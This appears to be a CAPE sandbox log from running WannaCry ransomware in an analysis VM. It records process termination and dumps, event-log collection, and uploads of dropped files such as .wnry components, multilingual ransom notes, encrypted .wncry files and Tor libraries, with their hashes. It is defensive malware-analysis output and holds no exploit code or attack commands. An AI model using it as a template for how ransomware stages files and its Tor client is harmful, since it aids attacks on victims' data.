2025-12-08 09:11:18,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\402.WNCRYT to files\2a56432f97d9d2da6458ff9007c160a5f6290b440cb103147e85dbcc556b850a; Size is 194520; Max size: 100000000
2025-12-08 09:11:18,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\403.WNCRYT to files\ea5bb9cfce65caa7b056caa51a4ca412fa91212926a155d0be8ebb380ccbbd81; Size is 1048; Max size: 100000000
2025-12-08 09:11:18,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\405.WNCRYT to files\04de69a4c406df958f1bc6c00ba29c059c80e0d288cd44344271c9f3b2383d46; Size is 2328; Max size: 100000000
2025-12-08 09:11:18,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\407.WNCRYT to files\e65bdf9784b740cd90f964cfbd4d7fbe46cab5ee81fb8c240b085e52e9bc7d99; Size is 1048; Max size: 100000000
2025-12-08 09:11:18,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\408.WNCRYT to files\b25f2c0f229346e58576a66a0707402d03be1abecb04c2741d577d80e86c0ad7; Size is 415096; Max size: 100000000
2025-12-08 09:11:18,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\409.WNCRYT to files\11169d1e56565e93b09d1c6bbbb0d677c69991106619938dea14584150296136; Size is 1216; Max size: 100000000
2025-12-08 09:11:18,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\454.WNCRYT to files\e58a3a6f3cdd379c9e867f3c75a333175f51576e67a9df46975d86c660a0187f; Size is 125712; Max size: 100000000
2025-12-08 09:11:18,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\78.WNCRYT to files\247b1c7140f629ddee255d7eb0704635edb22169f52745f20b442dc4a4f4bf42; Size is 8192; Max size: 100000000
2025-12-08 09:11:21,937 [root] DEBUG: 816: api-cap: memcpy hook disabled due to count: 5000
2025-12-08 09:11:24,343 [lib.common.results] WARNING: File C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT size is too big: 2306867200, ignoring
2025-12-08 09:11:24,359 [root] DEBUG: 2580: NtTerminateProcess hook: Attempting to dump process 2580
2025-12-08 09:11:24,359 [root] DEBUG: 2580: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:24,359 [root] INFO: Process with pid 2580 has terminated
2025-12-08 09:11:37,765 [root] INFO: Analysis timeout hit, terminating analysis
2025-12-08 09:11:37,765 [lib.api.process] INFO: Terminate event set for <Process 3040 wannacry.exe>
2025-12-08 09:11:37,765 [root] DEBUG: 3040: Terminate Event: Attempting to dump process 3040
2025-12-08 09:11:37,765 [root] DEBUG: 3040: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,765 [root] DEBUG: 3040: Terminate Event: Current region 0x026193B0
2025-12-08 09:11:37,765 [lib.api.process] INFO: Termination confirmed for <Process 3040 wannacry.exe>
2025-12-08 09:11:37,765 [root] INFO: Terminate event set for process 3040
2025-12-08 09:11:37,765 [root] DEBUG: 3040: Terminate Event: CAPE shutdown complete for process 3040
2025-12-08 09:11:37,765 [lib.api.process] INFO: Terminate event set for <Process 1212 explorer.exe>
2025-12-08 09:11:37,765 [root] DEBUG: 1212: Terminate Event: Attempting to dump process 1212
2025-12-08 09:11:37,765 [root] DEBUG: 1212: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,781 [root] DEBUG: 1212: Terminate Event: Current region empty
2025-12-08 09:11:37,781 [root] DEBUG: 1212: Terminate Event: CAPE shutdown complete for process 1212
2025-12-08 09:11:37,781 [lib.api.process] INFO: Termination confirmed for <Process 1212 explorer.exe>
2025-12-08 09:11:37,781 [root] INFO: Terminate event set for process 1212
2025-12-08 09:11:37,781 [lib.api.process] INFO: Terminate event set for <Process 1740 @WanaDecryptor@.exe>
2025-12-08 09:11:37,796 [root] DEBUG: 1740: Terminate Event: Attempting to dump process 1740
2025-12-08 09:11:37,796 [root] DEBUG: 1740: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,796 [root] DEBUG: 1740: Terminate Event: Current region empty
2025-12-08 09:11:37,796 [root] DEBUG: 1740: Terminate Event: CAPE shutdown complete for process 1740
2025-12-08 09:11:37,796 [lib.api.process] INFO: Termination confirmed for <Process 1740 @WanaDecryptor@.exe>
2025-12-08 09:11:37,796 [root] INFO: Terminate event set for process 1740
2025-12-08 09:11:37,796 [lib.api.process] INFO: Terminate event set for <Process 556 svchost.exe>
2025-12-08 09:11:37,796 [root] DEBUG: 556: Terminate Event: Attempting to dump process 556
2025-12-08 09:11:37,796 [root] DEBUG: 556: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,796 [root] DEBUG: 556: Terminate Event: Current region empty
2025-12-08 09:11:37,796 [lib.api.process] INFO: Termination confirmed for <Process 556 svchost.exe>
2025-12-08 09:11:37,796 [root] INFO: Terminate event set for process 556
2025-12-08 09:11:37,796 [root] DEBUG: 556: Terminate Event: CAPE shutdown complete for process 556
2025-12-08 09:11:37,796 [lib.api.process] INFO: Terminate event set for <Process 1144 taskhsvc.exe>
2025-12-08 09:11:37,796 [root] DEBUG: 1144: Terminate Event: Attempting to dump process 1144
2025-12-08 09:11:37,812 [root] DEBUG: 1144: VerifyCodeSection: Executable code does not match, 0x58d of 0x23c670 matching
2025-12-08 09:11:37,812 [root] DEBUG: 1144: DoProcessDump: Code modification detected, dumping Imagebase at 0x00E40000.
2025-12-08 09:11:37,812 [root] DEBUG: 1144: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2025-12-08 09:11:37,812 [root] DEBUG: 1144: DumpProcess: Instantiating PeParser with address: 0x00E40000.
2025-12-08 09:11:37,812 [root] DEBUG: 1144: DumpProcess: Module entry point VA is 0x000014E0.
2025-12-08 09:11:37,828 [lib.common.results] INFO: Uploading file C:\fJCIHnd\CAPE\1144_332923711181122025 to procdump\3972d01322a170040a5984839aaea30fbc66fe0fb40b5cb0396b700d82c38361; Size is 3117056; Max size: 100000000
2025-12-08 09:11:37,843 [root] DEBUG: 1144: DumpProcess: Module image dump success - dump size 0x2f9000.
2025-12-08 09:11:37,843 [root] DEBUG: 1144: Terminate Event: Current region 0x028E93D0
2025-12-08 09:11:37,843 [root] DEBUG: 1144: YaraScan: Scanning 0x00E40000, size 0x2fdd44
2025-12-08 09:11:37,859 [root] DEBUG: 1144: ProcessImageBase: Main module image at 0x00E40000 unmodified (entropy change 8.534444e-03)
2025-12-08 09:11:37,859 [root] INFO: Added new file to list with pid None and path C:\Users\user\AppData\Roaming\tor\lock
2025-12-08 09:11:37,859 [root] DEBUG: 1144: Terminate Event: CAPE shutdown complete for process 1144
2025-12-08 09:11:37,859 [lib.api.process] INFO: Termination confirmed for <Process 1144 taskhsvc.exe>
2025-12-08 09:11:37,859 [root] INFO: Terminate event set for process 1144
2025-12-08 09:11:37,875 [lib.api.process] INFO: Terminate event set for <Process 816 @WanaDecryptor@.exe>
2025-12-08 09:11:37,875 [root] DEBUG: 816: Terminate Event: Attempting to dump process 816
2025-12-08 09:11:37,875 [root] DEBUG: 816: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,875 [root] DEBUG: 816: Terminate Event: Current region empty
2025-12-08 09:11:37,875 [root] DEBUG: 816: Terminate Event: CAPE shutdown complete for process 816
2025-12-08 09:11:37,875 [lib.api.process] INFO: Termination confirmed for <Process 816 @WanaDecryptor@.exe>
2025-12-08 09:11:37,875 [root] INFO: Terminate event set for process 816
2025-12-08 09:11:37,875 [lib.api.process] INFO: Terminate event set for <Process 432 services.exe>
2025-12-08 09:11:37,875 [root] DEBUG: 432: Terminate Event: Attempting to dump process 432
2025-12-08 09:11:37,875 [root] DEBUG: 432: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,875 [root] DEBUG: 432: Terminate Event: Current region empty
2025-12-08 09:11:37,875 [root] DEBUG: 432: Terminate Event: CAPE shutdown complete for process 432
2025-12-08 09:11:37,875 [lib.api.process] INFO: Termination confirmed for <Process 432 services.exe>
2025-12-08 09:11:37,875 [root] INFO: Terminate event set for process 432
2025-12-08 09:11:37,875 [lib.api.process] INFO: Terminate event set for <Process 900 svchost.exe>
2025-12-08 09:11:37,890 [root] DEBUG: 900: Terminate Event: Attempting to dump process 900
2025-12-08 09:11:37,890 [root] DEBUG: 900: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,890 [root] DEBUG: 900: Terminate Event: Current region empty
2025-12-08 09:11:37,890 [lib.api.process] INFO: Termination confirmed for <Process 900 svchost.exe>
2025-12-08 09:11:37,890 [root] INFO: Terminate event set for process 900
2025-12-08 09:11:37,890 [root] DEBUG: 900: Terminate Event: CAPE shutdown complete for process 900
2025-12-08 09:11:37,890 [lib.api.process] INFO: Terminate event set for <Process 2020 OfficeClickToRun.exe>
2025-12-08 09:11:37,890 [root] DEBUG: 2020: Terminate Event: Attempting to dump process 2020
2025-12-08 09:11:37,890 [root] DEBUG: 2020: DoProcessDump: Skipping process dump as code is identical on disk.
2025-12-08 09:11:37,890 [root] DEBUG: 2020: Terminate Event: Current region empty
2025-12-08 09:11:37,890 [lib.api.process] INFO: Termination confirmed for <Process 2020 OfficeClickToRun.exe>
2025-12-08 09:11:37,890 [root] INFO: Terminate event set for process 2020
2025-12-08 09:11:37,890 [root] INFO: Created shutdown mutex
2025-12-08 09:11:37,890 [root] DEBUG: 2020: Terminate Event: CAPE shutdown complete for process 2020
2025-12-08 09:11:38,890 [root] INFO: Shutting down package
2025-12-08 09:11:38,890 [root] INFO: Stopping auxiliary modules
2025-12-08 09:11:38,890 [root] INFO: Stopping auxiliary module: Browser
2025-12-08 09:11:38,890 [root] INFO: Stopping auxiliary module: Curtain
2025-12-08 09:11:38,921 [lib.common.results] INFO: Uploading file C:\curtain.log to curtain/1765156298.921875.curtain.log; Size is 36; Max size: 100000000
2025-12-08 09:11:38,921 [root] INFO: Stopping auxiliary module: End_noisy_tasks
2025-12-08 09:11:38,921 [root] INFO: Stopping auxiliary module: Evtx
2025-12-08 09:11:38,953 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Application.evtx to zip dump
2025-12-08 09:11:38,968 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\HardwareEvents.evtx to zip dump
2025-12-08 09:11:38,968 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Internet Explorer.evtx to zip dump
2025-12-08 09:11:38,984 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Key Management Service.evtx to zip dump
2025-12-08 09:11:38,984 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Microsoft-Windows-Sysmon%4Operational.evtx to zip dump
2025-12-08 09:11:39,156 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\OAlerts.evtx to zip dump
2025-12-08 09:11:39,171 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Security.evtx to zip dump
2025-12-08 09:11:39,187 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Setup.evtx to zip dump
2025-12-08 09:11:39,187 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\System.evtx to zip dump
2025-12-08 09:11:39,203 [modules.auxiliary.evtx] DEBUG: Adding C:/windows/Sysnative/winevt/Logs\Windows PowerShell.evtx to zip dump
2025-12-08 09:11:39,234 [root] DEBUG: 1144: api-cap: GetSystemTimeAsFileTime hook disabled due to count: 5000
2025-12-08 09:11:39,281 [modules.auxiliary.evtx] DEBUG: Uploading evtx.zip to host
2025-12-08 09:11:39,281 [lib.common.results] INFO: Uploading file evtx.zip to evtx/evtx.zip; Size is 204793; Max size: 100000000
2025-12-08 09:11:39,296 [root] INFO: Stopping auxiliary module: Human
2025-12-08 09:11:40,500 [root] INFO: Stopping auxiliary module: Pre_script
2025-12-08 09:11:40,500 [root] INFO: Stopping auxiliary module: Screenshots
2025-12-08 09:11:40,500 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2480: C:\Users\user\AppData\Local\Temp\taskse.exe, ImageBase: 0x00400000
2025-12-08 09:11:40,500 [root] DEBUG: 3040: CreateProcessHandler: Injection info set for new process 2252: C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe, ImageBase: 0x00400000
2025-12-08 09:11:40,843 [root] DEBUG: 1144: DLL loaded at 0x745B0000: C:\Windows\system32\SAMCLI (0xf000 bytes).
2025-12-08 09:11:40,843 [root] DEBUG: 1144: hook_api: Warning - NetUserGetInfo export address 0x7466528E differs from GetProcAddress -> 0x745B1BE2 (SAMCLI.DLL::0x1be2)
2025-12-08 09:11:40,843 [root] DEBUG: 1144: DLL loaded at 0x745A0000: C:\Windows\system32\WKSCLI (0xf000 bytes).
2025-12-08 09:11:40,843 [root] DEBUG: 1144: hook_api: Warning - NetGetJoinInformation export address 0x74664AD2 differs from GetProcAddress -> 0x745A2C3F (WKSCLI.DLL::0x2c3f)
2025-12-08 09:11:40,843 [root] DEBUG: 1144: hook_api: Warning - NetUserGetLocalGroups export address 0x746652A4 differs from GetProcAddress -> 0x745B28AA (SAMCLI.DLL::0x28aa)
2025-12-08 09:11:40,843 [root] DEBUG: 1144: DLL loaded at 0x74570000: C:\Windows\system32\LOGONCLI (0x22000 bytes).
2025-12-08 09:11:40,843 [root] DEBUG: 1144: hook_api: Warning - DsEnumerateDomainTrustsW export address 0x74663C9E differs from GetProcAddress -> 0x7457B202 (LOGONCLI.DLL::0xb202)
2025-12-08 09:11:40,843 [root] DEBUG: 1144: DLL loaded at 0x74660000: C:\Windows\system32\NETAPI32 (0x11000 bytes).
2025-12-08 09:11:40,859 [root] DEBUG: 1144: DLL loaded at 0x74560000: C:\Windows\system32\netutils (0x9000 bytes).
2025-12-08 09:11:40,859 [root] DEBUG: 1144: DLL loaded at 0x74240000: C:\Windows\system32\srvcli (0x19000 bytes).
2025-12-08 09:11:43,593 [root] INFO: Stopping auxiliary module: Usage
2025-12-08 09:11:44,421 [root] INFO: Stopping auxiliary module: During_script
2025-12-08 09:11:44,421 [root] INFO: Finishing auxiliary modules
2025-12-08 09:11:44,421 [root] INFO: Shutting down pipe server and dumping dropped files
2025-12-08 09:11:44,421 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\b.wnry to files\d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa; Size is 1440054; Max size: 100000000
2025-12-08 09:11:44,437 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\c.wnry to files\3dae0b2eb7afd1cf2580436a72293bf24400d1c480f3608664acd44e8e42144a; Size is 780; Max size: 100000000
2025-12-08 09:11:44,437 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_bulgarian.wnry to files\40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd; Size is 47879; Max size: 100000000
2025-12-08 09:11:44,453 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_chinese (simplified).wnry to files\845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a; Size is 54359; Max size: 100000000
2025-12-08 09:11:44,453 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_chinese (traditional).wnry to files\5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a; Size is 79346; Max size: 100000000
2025-12-08 09:11:44,453 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_croatian.wnry to files\3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171; Size is 39070; Max size: 100000000
2025-12-08 09:11:44,453 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_czech.wnry to files\5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150; Size is 40512; Max size: 100000000
2025-12-08 09:11:44,468 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_danish.wnry to files\a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6; Size is 37045; Max size: 100000000
2025-12-08 09:11:44,468 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_dutch.wnry to files\2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c; Size is 36987; Max size: 100000000
2025-12-08 09:11:44,468 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_english.wnry to files\26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5; Size is 36973; Max size: 100000000
2025-12-08 09:11:44,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_filipino.wnry to files\d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324; Size is 37580; Max size: 100000000
2025-12-08 09:11:44,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_finnish.wnry to files\1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e; Size is 38377; Max size: 100000000
2025-12-08 09:11:44,484 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_french.wnry to files\9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc; Size is 38437; Max size: 100000000
2025-12-08 09:11:44,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_german.wnry to files\2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61; Size is 37181; Max size: 100000000
2025-12-08 09:11:44,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_greek.wnry to files\e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9; Size is 49044; Max size: 100000000
2025-12-08 09:11:44,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_indonesian.wnry to files\23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4; Size is 37196; Max size: 100000000
2025-12-08 09:11:44,500 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_italian.wnry to files\49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07; Size is 36883; Max size: 100000000
2025-12-08 09:11:44,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_japanese.wnry to files\7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e; Size is 81844; Max size: 100000000
2025-12-08 09:11:44,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_korean.wnry to files\552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0; Size is 91501; Max size: 100000000
2025-12-08 09:11:44,515 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_latvian.wnry to files\a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536; Size is 41169; Max size: 100000000
2025-12-08 09:11:44,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_norwegian.wnry to files\cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a; Size is 37577; Max size: 100000000
2025-12-08 09:11:44,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_polish.wnry to files\519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e; Size is 39896; Max size: 100000000
2025-12-08 09:11:44,531 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_portuguese.wnry to files\bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66; Size is 37917; Max size: 100000000
2025-12-08 09:11:44,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_romanian.wnry to files\70c0f32ed379ae899e5ac975e20bbbacd295cf7cd50c36174d2602420c770ac1; Size is 52161; Max size: 100000000
2025-12-08 09:11:44,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_russian.wnry to files\02932052fafe97e6acaaf9f391738a3a826f5434b1a013abbfa7a6c1ade1e078; Size is 47108; Max size: 100000000
2025-12-08 09:11:44,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_slovak.wnry to files\e64178e339c8e10eac17a236a67b892d0447eb67b1dcd149763dad6fd9f72729; Size is 41391; Max size: 100000000
2025-12-08 09:11:44,546 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_spanish.wnry to files\72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1; Size is 37381; Max size: 100000000
2025-12-08 09:11:44,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_swedish.wnry to files\146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4; Size is 38483; Max size: 100000000
2025-12-08 09:11:44,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_turkish.wnry to files\6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415; Size is 42582; Max size: 100000000
2025-12-08 09:11:44,562 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\msg\m_vietnamese.wnry to files\1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8; Size is 93778; Max size: 100000000
2025-12-08 09:11:44,578 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\r.wnry to files\402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c; Size is 864; Max size: 100000000
2025-12-08 09:11:44,578 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\s.wnry to files\e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b; Size is 3038286; Max size: 100000000
2025-12-08 09:11:44,593 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\t.wnry to files\97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6; Size is 65816; Max size: 100000000
2025-12-08 09:11:44,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\taskdl.exe to files\4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79; Size is 20480; Max size: 100000000
2025-12-08 09:11:44,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\taskse.exe to files\2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d; Size is 20480; Max size: 100000000
2025-12-08 09:11:44,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\u.wnry to files\b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25; Size is 245760; Max size: 100000000
2025-12-08 09:11:44,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\00000000.pky to files\364e2dc0a47197dc12767e6a85fb91c0889a2c9d4aa295c80a749fa579ad2b9c; Size is 276; Max size: 100000000
2025-12-08 09:11:44,609 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\00000000.res to files\4c9dd6648c5587e3e76fe648dbd13546b9e583cd99dd3dc569748f18c5c85112; Size is 136; Max size: 100000000
2025-12-08 09:11:44,625 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe to files\b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25; Size is 245760; Max size: 100000000
2025-12-08 09:11:44,625 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\@Please_Read_Me@.txt to files\840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5; Size is 933; Max size: 100000000
2025-12-08 09:11:44,625 [lib.common.results] INFO: Uploading file C:\@Please_Read_Me@.txt to files\840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5; Size is 933; Max size: 100000000
2025-12-08 09:11:44,640 [lib.common.results] INFO: Uploading file C:\@WanaDecryptor@.exe to files\b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25; Size is 245760; Max size: 100000000
2025-12-08 09:11:44,640 [lib.common.results] INFO: Uploading file C:\ba69bdf0a250e352360c33\@Please_Read_Me@.txt to files\840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5; Size is 933; Max size: 100000000
2025-12-08 09:11:44,640 [lib.common.results] INFO: Uploading file C:\ba69bdf0a250e352360c33\@WanaDecryptor@.exe to files\b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25; Size is 245760; Max size: 100000000
2025-12-08 09:11:44,640 [lib.common.results] INFO: Uploading file c:\ba69bdf0a250e352360c33\1025\eula.rtf.wncry to files\ee1010122a6c14fd6d19dfd8785ace54a3babae9374295c97508390c282b69c4; Size is 13688; Max size: 100000000
2025-12-08 09:11:44,640 [lib.common.results] INFO: Uploading file C:\ba69bdf0a250e352360c33\1025\@Please_Read_Me@.txt to files\840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5; Size is 933; Max size: 100000000
2025-12-08 09:11:44,656 [lib.common.results] INFO: Uploading file C:\ba69bdf0a250e352360c33\1025\@WanaDecryptor@.exe to files\b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25; Size is 245760; Max size: 100000000
2025-12-08 09:11:44,656 [lib.common.results] INFO: Uploading file c:\ba69bdf0a250e352360c33\1028\eula.rtf.wncry to files\7b17b11c4906d7de2496e3a034e9dce1dc29fd052a89e6ab22a5dcdfe73a52af; Size is 12376; Max size: 100000000
2025-12-08 09:11:44,656 [lib.common.results] INFO: Uploading file C:\ba69bdf0a250e352360c33\1028\@Please_Read_Me@.txt to files\840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5; Size is 933; Max size: 100000000
2025-12-08 09:11:44,656 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe.lnk to files\68b08d5ebfedb16601b799ab4b67abf2d386a29f4df22517d9f02cae81ffb964; Size is 919; Max size: 100000000
2025-12-08 09:11:44,656 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db to files\8429d5c6eb134eb64d8b0f3ecce83ab4d4d16e73c2d76993163372692b65ea8f; Size is 24; Max size: 100000000
2025-12-08 09:11:44,671 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db to files\715e07274cc5036b7968f9768778e668089076f2749538e236179e6b950ae712; Size is 1048576; Max size: 100000000
2025-12-08 09:11:44,671 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db to files\f58a3612c5a057fec131540c231254f0244556df334e0494e40d944dc538fd7a; Size is 1048576; Max size: 100000000
2025-12-08 09:11:44,687 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db to files\ee3e1212dbd47e058e30b119a92f853d3962558065fa3065ad5c1d47654c4140; Size is 24; Max size: 100000000
2025-12-08 09:11:44,687 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db to files\62ce260f5e10fc17bf63faafa39912febf61d20fad51cc11606a295801743799; Size is 24; Max size: 100000000
2025-12-08 09:11:44,687 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db to files\08f2b4ee3ee36375adb389bda02f8c144cc3dc6de5afdc60ebb40e007f177d72; Size is 3256; Max size: 100000000
2025-12-08 09:11:44,703 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\libeay32.dll to files\58be53d5012b3f45c1ca6f4897bece4773efbe1ccbf0be460061c183ee14ca19; Size is 3197106; Max size: 100000000
2025-12-08 09:11:44,718 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent-2-0-5.dll to files\77a250e81fdaf9a075b1244a9434c30bf449012c9b647b265fa81a7b0db2513f; Size is 719217; Max size: 100000000
2025-12-08 09:11:44,734 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_core-2-0-5.dll to files\5cd126b4f8c77bdf0c5c980761a9c84411586951122131f13b0640db83f792d8; Size is 417759; Max size: 100000000
2025-12-08 09:11:44,734 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\libevent_extra-2-0-5.dll to files\957d58061a42ca343064ec5fb0397950f52aedf0594a18867d1339d5fbb12e7e; Size is 411369; Max size: 100000000
2025-12-08 09:11:44,750 [lib.common.results] INFO: Uploading file C:\Users\user\AppData\Local\Temp\TaskData\Tor\libgcc_s_sjlj-1.dll to files\9aeccf88253d4557a90793e22414868053caaab325842c0d7acb0365e88cd53b; Size is 523262; Max size: 100000000
